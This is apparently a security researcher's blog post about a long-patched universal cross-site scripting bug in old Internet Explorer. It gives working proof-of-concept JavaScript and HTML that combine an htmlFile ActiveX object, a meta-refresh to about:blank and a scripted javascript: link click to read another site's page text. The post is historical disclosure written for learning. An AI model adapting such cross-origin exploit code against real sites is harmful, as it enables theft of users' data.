UXSS: htmlFile ActiveX + about:blank Meta-Refresh + Link Click

A streamlined variant of the htmlFile about:blank UXSS — no new windows or server redirects needed. Loading a target site in an iFrame, navigating its nested iFrame to about:blank via a meta-refresh (which made the blank inherit the parent iFrame’s origin), and then using an htmlFile ActiveX link targeted at that iFrame’s name executed javascript: in the target’s context.

function main()
{
	window[0][0].location = "metaredir.html"; // nested iFrame → about:blank with target origin
	setTimeout('accessiFrame()', 1000);
}

function accessiFrame()
{
	ax = new ActiveXObject("htmlFile");
	ax.parentWindow.setTimeout(
		'document.write("<a target=\'session_iframe\' id=\'lnk\' href=\'javascript:alert(parent.document.body.innerText)\'>G</a><script>document.all.lnk.click();<\/script>");document.close()'
	);
}

metarefresh.html:

<meta http-equiv="refresh" content="1;url=about:blank">

The outer iFrame loaded digg.com. digg.com contained its own inner iFrame (session_iframe). Navigating that inner iFrame to metarefresh.html caused it to land on about:blank — but because the meta-refresh came from the digg.com context, the blank page inherited digg.com’s origin. The htmlFile ActiveX then created a link targeting session_iframe by name, with a javascript: href. Clicking the link programmatically ran the script inside digg.com’s origin, reading parent.document.body.innerText — Digg’s full page text.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Resident Script Execution via Cached iFrame window.open] :: [mhtml: Protocol Loads Local Zip Files Without Warnings] >